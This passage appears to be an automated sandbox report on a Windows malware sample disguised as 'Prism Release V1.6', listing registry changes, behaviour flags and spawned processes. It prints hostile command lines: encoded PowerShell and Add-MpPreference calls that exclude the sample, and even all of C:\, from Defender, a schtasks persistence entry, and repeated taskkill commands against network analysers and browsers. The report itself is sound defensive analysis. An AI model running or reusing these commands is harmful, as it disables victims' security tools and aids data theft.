| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcwBhACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AeQBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIABSAFUATgAgAEEAUwAgAEEARABNAEkATgAgAEkARgAgAEkATgBKAEUAQwBUAEkATwBOACAARgBBAEkATABTACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBoAHAAeQAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAZABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdgBrACMAPgA="
C:\Users\Admin\AppData\Roaming\Prism.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6b37ab58,0x7ffc6b37ab68,0x7ffc6b37ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4560 --field-trial-handle=1920,i,11029077590496542175,14049549880295092970,131072 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe" "--multiprocessing-fork" "parent_pid=4008" "pipe_handle=468"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
